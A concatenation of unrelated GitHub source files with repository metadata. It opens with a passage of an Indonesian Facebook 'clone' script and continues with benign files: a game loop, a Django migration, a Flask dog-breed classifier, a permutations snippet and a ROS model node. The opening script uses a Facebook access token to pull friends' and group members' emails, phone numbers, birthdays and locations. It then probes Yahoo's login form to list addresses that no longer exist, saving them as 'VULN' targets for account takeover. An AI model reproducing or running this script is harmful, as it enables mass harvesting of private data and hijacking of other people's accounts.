print"\033[1;91m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print 42*"\033[1;96m="
aid = raw_input('\033[1;96m[+] \033[1;93mMasukan ID/Nama\033[1;91m : \033[1;97m')
jalan('\033[1;96m[✺] \033[1;93mTunggu sebentar \033[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(r.text)
for i in cok['data']:
if aid in i['name'] or aid in i['id']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
print 43*"\033[1;96m="
try:
print '\033[1;96m[➹] \033[1;93mNama\033[1;97m : '+z['name']
except KeyError: print '\033[1;96m[?] \033[1;93mNama\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mID\033[1;97m : '+z['id']
except KeyError: print '\033[1;96m[?] \033[1;93mID\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mEmail\033[1;97m : '+z['email']
except KeyError: print '\033[1;96m[?] \033[1;93mEmail\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mNo HP\033[1;97m : '+z['mobile_phone']
except KeyError: print '\033[1;96m[?] \033[1;93mNo HP\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mTempat tinggal\033[1;97m: '+z['location']['name']
except KeyError: print '\033[1;96m[?] \033[1;93mTempat tinggal\033[1;97m: \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mTanggal lahir\033[1;97m : '+z['birthday']
except KeyError: print '\033[1;96m[?] \033[1;93mTanggal lahir\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mSekolah\033[1;97m : '
for q in z['education']:
try:
print '\033[1;91m ~ \033[1;97m'+q['school']['name']
except KeyError: print '\033[1;91m ~ \033[1;91mTidak ada'
except KeyError: pass
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
else:
pass
else:
print"\033[1;96m[✖] \x1b[1;91mAkun tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def yahoo():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;97m1.\x1b[1;93m Clone dari daftar teman"
print "\x1b[1;97m2.\x1b[1;93m Clone dari teman"
print "\x1b[1;97m3.\x1b[1;93m Clone dari member group"
print "\x1b[1;97m4.\x1b[1;93m Clone dari file"
print "\n\x1b[1;91m0.\x1b[1;91m Kembali"
clone()
def clone():
embuh = raw_input("\n\x1b[1;97m >>> ")
if embuh =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
elif embuh =="1":
clone_dari_daftar_teman()
elif embuh =="2":
clone_dari_teman()
elif embuh =="3":
clone_dari_member_group()
elif embuh =="4":
clone_dari_file()
elif embuh =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
def clone_dari_daftar_teman():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token Invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
jalan('\033[1;96m[\x1b[1;97m✺\x1b[1;96m] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
kimak = json.loads(teman.text)
jalan('\033[1;96m[\x1b[1;97m✺\x1b[1;96m] \033[1;93mStart \033[1;97m...')
print ('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+id)
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
print("\033[1;96m[➹] \033[1;97mNama \033[1;91m: \033[1;92m"+nama+ '\n')
save = open('out/MailVuln.txt','a')
save.write("Nama : "+ nama + '\n' "ID : "+ id + '\n' "Email : "+ mail + '\n\n')
save.close()
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/MailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_teman():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mMasukan ID teman \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
jalan('\033[1;96m[✺] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
kimak = json.loads(teman.text)
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 43*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+id)
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
print("\033[1;96m[➹] \033[1;97mNama \033[1;91m: \033[1;92m"+nama)
save = open('out/TemanMailVuln.txt','a')
save.write("Nama : "+ nama + '\n' "ID : "+ id + '\n' "Email : "+ mail + '\n\n')
save.close()
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/TemanMailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_member_group():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
id=raw_input('\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
jalan('\033[1;96m[✺] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
kimak = json.loads(teman.text)
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+id)
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
print("\033[1;96m[➹] \033[1;97mNama \033[1;91m: \033[1;92m"+nama)
save = open('out/GrupMailVuln.txt','a')
save.write("Nama : "+ nama + '\n' "ID : "+ id + '\n' "Email : "+ mail + '\n\n')
save.close()
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/GrupMailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_file():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
print 42*"\033[1;96m="
files = raw_input("\033[1;96m[+] \033[1;93mNama File \033[1;91m: \033[1;97m")
try:
total = open(files,"r")
mail = total.readlines()
except IOError:
print"\033[1;96m[!] \x1b[1;91mFile tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
mpsh = []
jml = 0
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
mail = open(files,"r").readlines()
for pw in mail:
mail = pw.replace("\n","")
jml +=1
mpsh.append(jml)
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
save = open('out/MailVuln.txt','a')
save.write("Email: "+ mail + '\n\n')
save.close()
berhasil.append(mail)
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile Tersimpan \033[1;91m:\033[1;97m out/FileMailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
if __name__ == '__main__':
siapa()
|
[
"noreply@github.com"
] |
Warriors12-pl.noreply@github.com
|
|
54aa67ec3c5273543302689ee3673ae0c5f94508
|
5bee51325c2e95e39e15cf95e95f525c4a7a79c7
|
/run.py
|
fe0c65ec5b2897b2b469ac9ea34ffe4e2ee4b69b
|
[] |
no_license
|
kostistsaprailis/terminal-quests
|
c5f7665372359f5ac07943a859c5ecabceaf7e49
|
9ced458d45fe1edb4a89bedc0e3fabdf9359231f
|
refs/heads/master
| 2021-03-30T21:05:38.896709
| 2018-03-14T21:36:34
| 2018-03-14T21:36:34
| 124,951,839
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 320
|
py
|
import os
import time
from world import World
from hero import Hero
def update_game_state(world, tick=0.1):
    """Advance the game world by one frame.

    Calls ``world.update_world()`` once, then sleeps for *tick* seconds to
    throttle the main loop's frame rate.

    Args:
        world: object exposing an ``update_world()`` method.
        tick (float): delay in seconds between frames. Defaults to 0.1
            (~10 updates/second), matching the original hard-coded value,
            so existing callers are unaffected.
    """
    world.update_world()
    time.sleep(tick)
if __name__ == '__main__':
    # Entry point: clear the terminal, build a world containing one hero,
    # then run the game loop forever (stop with Ctrl+C).
    os.system('clear')
    world = World()
    hero = Hero()
    world.add_hero(hero)
    while True:
        update_game_state(world)
|
[
"kt@vaix.ai"
] |
kt@vaix.ai
|
529764ce7d089cb8e87188ae76b3d2386d94799f
|
55c250525bd7198ac905b1f2f86d16a44f73e03a
|
/Python/Projects/sphinx/sphinx-doc-translations/sphinx/sphinx/ext/ifconfig.py
|
993ef3ebae432ab8ed889876e2c6ddcb3294594b
|
[
"LicenseRef-scancode-other-permissive",
"BSD-3-Clause"
] |
permissive
|
NateWeiler/Resources
|
213d18ba86f7cc9d845741b8571b9e2c2c6be916
|
bd4a8a82a3e83a381c97d19e5df42cbababfc66c
|
refs/heads/master
| 2023-09-03T17:50:31.937137
| 2023-08-28T23:50:57
| 2023-08-28T23:50:57
| 267,368,545
| 2
| 1
| null | 2022-09-08T15:20:18
| 2020-05-27T16:18:17
| null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:6b14675b69f1e4709abc755afdb42367393cbdcc90a45fa7de0be6f62f368d7c
size 2583
|
[
"nateweiler84@gmail.com"
] |
nateweiler84@gmail.com
|
e2c528db316231be8009da548b2c2a55e74c7ffd
|
df49823eb23474c89a3bbb2af3979d71c8d20571
|
/opc_ua/migrations/0005_auto_20191203_1608.py
|
1d8c38d995808b6ed873f35d0daa7ce2ef1ffae2
|
[] |
no_license
|
AleksZ13ru/scada_server_app
|
40503fdcf1fbf1b78e39b28e318392e4c2200e70
|
f9f53dbeb5c3f80b4583bddfd4ba37d8b02fd632
|
refs/heads/master
| 2022-07-30T07:02:50.475500
| 2020-01-13T08:23:55
| 2020-01-13T08:23:55
| 224,506,622
| 0
| 0
| null | 2022-07-06T20:24:02
| 2019-11-27T19:52:59
|
Python
|
UTF-8
|
Python
| false
| false
| 409
|
py
|
# Generated by Django 2.2.7 on 2019-12-03 13:08
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django 2.2.7: makes MessageEvent.ask_dt optional
    # (nullable in the DB and not required in forms) instead of mandatory.
    dependencies = [
        ('opc_ua', '0004_remove_messagebit_enable'),
    ]
    operations = [
        migrations.AlterField(
            model_name='messageevent',
            name='ask_dt',
            field=models.DateTimeField(blank=True, null=True),
        ),
    ]
|
[
"a.zaykin@list.ru"
] |
a.zaykin@list.ru
|
3cb1b0d90ab46d1933f4410dc81bd61892117810
|
872e1549a2ea162c51049565b74f001676e866b3
|
/app.py
|
2f0dc76949c240785ad7fd977662a5de29f0b3eb
|
[] |
no_license
|
hanseljulio/DogVision
|
64a69df612a0d82e255e87c884cd1b7118b0db6a
|
636d89f08c08e697d922ea6a0623caa8b04f380e
|
refs/heads/master
| 2023-08-08T02:47:58.784407
| 2021-09-17T08:24:25
| 2021-09-17T08:24:25
| 406,600,244
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,700
|
py
|
from enum import unique
from flask import Flask, render_template, redirect, url_for, request, session, flash
import tensorflow as tf
import tensorflow_hub as hub
import os
from werkzeug.utils import secure_filename
import numpy as np
app = Flask(__name__)
# app.config["IMAGE_UPLOADS"] = "static/uploads"
# Upload whitelist; extensions are compared upper-cased in allowed_image().
app.config["ALLOWED_IMAGE_EXTENSIONS"] = ["JPG", "PNG", "JFIF", "JPEG"]
# Define constant sizes
# IMG_SIZE: images are resized to IMG_SIZE x IMG_SIZE before inference;
# BATCH_SIZE: images per batch fed to the model.
IMG_SIZE = 224
BATCH_SIZE = 32
# Class labels, index-aligned with the model's output vector
# (get_pred_label maps argmax index -> breed name). Do not reorder.
unique_breeds = ['Affenpinscher', 'Afghan Hound', 'African hunting dog', 'Airedale',
                 'American_staffordshire_terrier', 'Appenzeller',
                 'Australian terrier', 'Basenji', 'Basset', 'Beagle',
                 'Bedlington terrier', 'Bernese mountain dog',
                 'Black and tan coonhound', 'Blenheim spaniel', 'Bloodhound',
                 'Bluetick', 'Border collie', 'Border terrier', 'Borzoi',
                 'Boston bull', 'Bouvier des flandres', 'Boxer',
                 'Brabancon griffon', 'Briard', 'Brittany spaniel', 'Bull mastiff',
                 'Cairn', 'Cardigan', 'Chesapeake bay retriever', 'Chihuahua',
                 'Chow', 'Clumber', 'Cocker_spaniel', 'Collie',
                 'Curly-coated retriever', 'Dandie dinmont', 'Dhole', 'Dingo',
                 'Doberman', 'English foxhound', 'English setter',
                 'English springer', 'Entlebucher', 'Eskimo dog',
                 'Flat-coated retriever', 'French bulldog', 'German shepherd',
                 'German short-haired pointer', 'Giant schnauzer',
                 'Golden retriever', 'Gordon setter', 'Great dane',
                 'Great pyrenees', 'Greater Swiss mountain dog', 'Groenendael',
                 'Ibizan hound', 'Irish setter', 'Irish terrier',
                 'Irish water spaniel', 'Irish wolfhound', 'Italian greyhound',
                 'Japanese spaniel', 'Keeshond', 'Kelpie', 'Kerry blue terrier',
                 'Komondor', 'Kuvasz', 'Labrador retriever', 'Lakeland terrier',
                 'Leonberg', 'Lhasa', 'Malamute', 'Malinois', 'Maltese dog',
                 'Mexican hairless', 'Miniature pinscher', 'Miniature poodle',
                 'Miniature schnauzer', 'Newfoundland', 'Norfolk terrier',
                 'Norwegian elkhound', 'Norwich terrier', 'Old english sheepdog',
                 'Otterhound', 'Papillon', 'Pekinese', 'Pembroke', 'Pomeranian',
                 'Pug', 'Redbone', 'Rhodesian ridgeback', 'Rottweiler',
                 'Saint_bernard', 'Saluki', 'Samoyed', 'Schipperke',
                 'Scotch terrier', 'Scottish deerhound', 'Sealyham terrier',
                 'Shetland sheepdog', 'Shih-tzu', 'Siberian husky', 'Silky terrier',
                 'Soft-coated wheaten terrier', 'Staffordshire bullterrier',
                 'Standard poodle', 'Standard schnauzer', 'Sussex spaniel',
                 'Tibetan mastiff', 'Tibetan terrier', 'Toy poodle', 'Toy terrier',
                 'Vizsla', 'Walker hound', 'Weimaraner', 'Welsh springer spaniel',
                 'West highland white terrier', 'whippet',
                 'Wire-haired fox terrier', 'Yorkshire terrier']
# Deep learning functions
def load_model(model_path):
    """Load a trained Keras model from *model_path*.

    Registers the TF-Hub ``KerasLayer`` as a custom object so checkpoints
    containing hub layers deserialize correctly.
    """
    print(f"Loading saved model from: {model_path}")
    custom = {"KerasLayer": hub.KerasLayer}
    return tf.keras.models.load_model(model_path, custom_objects=custom)
def get_image_label(image_path, label):
    """Load and preprocess the image at *image_path*, returning the
    resulting tensor paired with its *label* as a (image, label) tuple."""
    return process_image(image_path), label
def allowed_image(filename):
    """Return True if *filename* has an upload-whitelisted extension.

    The extension (text after the last dot) is compared case-insensitively
    against app.config["ALLOWED_IMAGE_EXTENSIONS"]. Names with no dot at
    all are rejected.
    """
    if "." not in filename:
        return False
    # rsplit keeps only the text after the LAST dot: "a.b.jpg" -> "jpg"
    ext = filename.rsplit(".", 1)[1]
    return ext.upper() in app.config["ALLOWED_IMAGE_EXTENSIONS"]
def get_pred_label(prediction_probabilities):
    """Map a vector of per-class probabilities to its breed name by
    taking the index of the highest probability."""
    best_index = np.argmax(prediction_probabilities)
    return unique_breeds[best_index]
def process_image(image_path, img_size=IMG_SIZE):
    """Read the image at *image_path* and return a float32 tensor of
    shape (IMG_SIZE, IMG_SIZE, 3) with values scaled into [0, 1]."""
    raw = tf.io.read_file(image_path)                 # bytes on disk
    decoded = tf.image.decode_jpeg(raw, channels=3)   # -> uint8 RGB tensor
    # uint8 0-255 -> float32 0-1
    scaled = tf.image.convert_image_dtype(decoded, tf.float32)
    # Resize to the model's expected input resolution
    return tf.image.resize(scaled, size=[IMG_SIZE, IMG_SIZE])
def create_data_batches(X, y=None, batch_size=BATCH_SIZE, valid_data=False, test_data=False):
    """Build a batched tf.data pipeline from image paths *X* and labels *y*.

    Modes:
      - test_data=True: paths only (no labels), no shuffling.
      - valid_data=True: (path, label) pairs, no shuffling.
      - otherwise (training): (path, label) pairs, shuffled before decoding.
    """
    if test_data:
        print("Creating test data batches...")
        # Only filepaths (no labels)
        ds = tf.data.Dataset.from_tensor_slices((tf.constant(X)))
        return ds.map(process_image).batch(BATCH_SIZE)
    if valid_data:
        print("Creating validation data batches...")
        # tf.constant(X) = filepaths, tf.constant(y) = labels
        ds = tf.data.Dataset.from_tensor_slices((tf.constant(X), tf.constant(y)))
        return ds.map(get_image_label).batch(BATCH_SIZE)
    print("Creating training data batches...")
    # Turn filepaths and labels into Tensors
    ds = tf.data.Dataset.from_tensor_slices((tf.constant(X), tf.constant(y)))
    # Shuffling path strings is far cheaper than shuffling decoded images,
    # so shuffle before the map that loads pixel data.
    ds = ds.shuffle(buffer_size=len(X))
    # (image, label) tuples: the map also decodes/preprocesses each image
    ds = ds.map(get_image_label)
    return ds.batch(BATCH_SIZE)
# Website functions
@app.route('/', methods=['GET', 'POST'])
def index():
    """Landing page: on GET render the upload form; on POST validate the
    uploaded image, save it under static/uploads/, and redirect to the
    /result page for classification."""
    if request.method == "POST":
        if request.files:
            image = request.files['image']
            # Reject uploads with an empty filename
            if image.filename == "":
                return '''
                <script> window.alert("Image must have a filename!"); </script>
                <script> window.location=document.referrer; </script>
                '''
            # Reject extensions not in the configured whitelist
            if not allowed_image(image.filename):
                return '''
                <script> window.alert("Image extension is not allowed!"); </script>
                <script> window.location=document.referrer; </script>
                '''
            else:
                # secure_filename strips path separators / unsafe characters
                filename = secure_filename(image.filename)
                image.save(os.path.join(app.root_path,'static/uploads/', filename))
                return redirect(url_for('result', filename=filename))
    return render_template('index.html')
@app.route('/list', methods=['GET', 'POST'])
def doglist():
    """Render the page listing every breed the model can recognize."""
    breeds = unique_breeds
    return render_template('doglist.html', unique_breeds=breeds, length=len(breeds))
@app.route('/result', methods=['GET', 'POST'])
def result():
    """Classify a previously uploaded image and render the prediction page.

    The uploaded file name arrives as the "filename" query parameter and is
    resolved against static/uploads/. The trained model is loaded lazily on
    the first request and cached on the function object, instead of being
    re-read from disk (a large .h5 checkpoint) on every single request.
    """
    filename = "static/uploads/" + request.args.get("filename")
    # One-time lazy model load; subsequent requests reuse the cached model.
    model = getattr(result, "_model", None)
    if model is None:
        model = load_model("21-21211630876899-full-image-set-mobilenetv2-Adam.h5")
        result._model = model
    filename_paths = [filename]
    custom_data = create_data_batches(filename_paths, test_data=True)
    # Make predictions on custom data
    custom_preds = model.predict(custom_data)
    # Get custom image prediction labels (one label per prediction row).
    # Local renamed from `result` to avoid shadowing this view function.
    custom_pred_labels = [get_pred_label(custom_preds[i]) for i in range(len(custom_preds))]
    predicted_breed = custom_pred_labels[0]
    return render_template('result.html', filename=filename, result=predicted_breed)
if __name__ == '__main__':
    # debug=False: keep the Werkzeug debugger/reloader disabled.
    app.run(debug=False)
|
[
"hanseljulio@yahoo.com"
] |
hanseljulio@yahoo.com
|
e7f73b4c833372c1cde39e5afcabdf8db5fee1a2
|
efd5d630aaab511e65e35f4675a3303d7e47fdd0
|
/4.py
|
281ae183f1140c98f83ef9a42a7b08d088df5f45
|
[] |
no_license
|
BoopPush/HardTasksPY
|
75d32bf00df44d26ed84b6de62b51f3c5cb62488
|
6651aa33df260ee12adcdbd94e55129f8868e99d
|
refs/heads/master
| 2023-07-24T07:09:23.639079
| 2021-09-11T12:01:18
| 2021-09-11T12:01:18
| 395,285,808
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 192
|
py
|
# Iterator that yields the k-length permutations (arrangements) of the
# characters of a string.
from itertools import permutations

m = input(": ")       # source string; its characters are the elements
n = int(input(": "))  # length of each arrangement

for i in permutations(m, n):
    print(i, end=' ')
|
[
"BoopPush@git.com"
] |
BoopPush@git.com
|
1ec3ebb69151f58cbb0bece288b33466f667ddb9
|
db9b61ee3e5284880f6198b330d2941134bc88de
|
/frongo/scripts/fremeniser.py
|
cdd7aae5cb7689d330f70fd480d0ed8e2cfec3ee
|
[
"MIT"
] |
permissive
|
AdrianKlei/fremen
|
3128c59822dd6825f0aebc700ffcbfb3dc8425c1
|
f1a6051d8e391a9f3ecabe75bafb27e8ec732fa8
|
refs/heads/master
| 2022-12-19T08:13:14.678054
| 2020-09-23T14:53:36
| 2020-09-23T14:53:36
| 297,958,036
| 0
| 0
|
NOASSERTION
| 2020-09-23T12:10:19
| 2020-09-23T12:10:18
| null |
UTF-8
|
Python
| false
| false
| 7,522
|
py
|
#!/usr/bin/env python
import rospy
import yaml
import json
import pymongo
import argparse
import numpy as np
import std_msgs
from std_srvs.srv import Trigger
from frongo.temporal_models import *
from frongo.graph_models import *
from frongo.srv import PredictState
from frongo.srv import PredictStateOrder
from frongo.srv import GraphModel
from frongo.srv import GetInfo
from frongo.srv import AddModel
def load_yaml(filename):
    """Load model definitions from a YAML file.

    Returns a list of definition dicts: a document that is already a list
    is returned as-is; a single mapping is wrapped in a one-element list.
    """
    data=[]
    rospy.loginfo("loading %s"%filename)
    with open(filename, 'r') as f:
        # NOTE(review): yaml.load without an explicit Loader can construct
        # arbitrary Python objects; prefer yaml.safe_load if this file is
        # not fully trusted.
        datum = yaml.load(f)
        if not isinstance(datum, list):
            data.append(datum)
        else:
            data=datum
    return data
class frongo(object):
    """ROS node wrapping FreMEn temporal models backed by MongoDB.

    Loads model definitions (from YAML or a service call), fills each model
    with documents queried from MongoDB, and exposes prediction/entropy/
    rebuild services under the /frongo/ namespace.
    """

    def __init__(self, data) :
        # data: list of model-definition dicts (may be empty/'' to start
        # with no models).
        self.is_fremen_active=False
        self.models=[]
        rospy.on_shutdown(self._on_node_shutdown)
        host = rospy.get_param("mongodb_host")
        port = rospy.get_param("mongodb_port")
        self.mongo_client = pymongo.MongoClient(host, port)
        if data:
            self.create_models(data)
            for i in self.models:
                print i
        # Subscribe to fremen server start topic
        rospy.Subscriber('/fremenserver_start', std_msgs.msg.Bool, self.fremen_restart_cb)
        rospy.loginfo("... Done")
        rospy.sleep(3)
        #Advertise Service
        self.get_states_srv=rospy.Service('/frongo/get_states', PredictState, self.get_states_cb)
        self.predict_ent_srv=rospy.Service('/frongo/get_entropies', PredictState, self.predict_entropy_cb)
        self.predict_ent_ord_srv=rospy.Service('/frongo/get_entropies_with_order', PredictStateOrder, self.predict_entropy_order_cb)
        self.predict_srv=rospy.Service('/frongo/predict_models', PredictState, self.predict_cb)
        self.predict_ord_srv=rospy.Service('/frongo/predict_models_with_order', PredictStateOrder, self.predict_order_cb)
        self.graph_build_srv=rospy.Service('/frongo/graph_model_build', GraphModel, self.graph_model_build_cb)
        self.new_model_srv=rospy.Service('/frongo/add_model_defs', AddModel, self.add_model_cb)
        self.info_srv=rospy.Service('/frongo/get_models', GetInfo, self.get_model_info_cb)
        self.rebuild_srv=rospy.Service('/frongo/rebuild_all_models', Trigger, self.rebuild_all_models_cb)
        #self.graph_model_construction()
        rospy.loginfo("All Done ...")
        rospy.spin()

    def get_states_cb(self, req):
        """Service cb: return the stored (epoch, state) samples of the
        model named req.model_name."""
        if len(req.epochs) < 2:
            rospy.logwarn("Size of epochs requested is less than two. Returning all epochs")
        for i in self.models:
            if i.name == req.model_name:
                epochs, predictions = i._get_states(req.epochs)
        # NOTE(review): if no model matches req.model_name this raises
        # NameError (epochs/predictions never assigned) — confirm intended.
        return epochs, predictions

    def get_model_info_cb(self, req):
        """Service cb: return the names and info strings of all models."""
        names=[]
        info=[]
        for i in self.models:
            names.append(i.name)
            info.append(i._get_info())
        return names, info

    def add_model_cb(self, req):
        """Service cb: parse YAML model definitions from the request and
        register them (building FreMEn models if the server is up)."""
        data=[]
        print req.model_def
        # NOTE(review): yaml.load without a Loader on service input — see
        # load_yaml; prefer yaml.safe_load for untrusted definitions.
        datum = yaml.load(req.model_def)
        print datum
        if not isinstance(datum, list):
            data.append(datum)
        else:
            data=datum
        self.create_models(data)
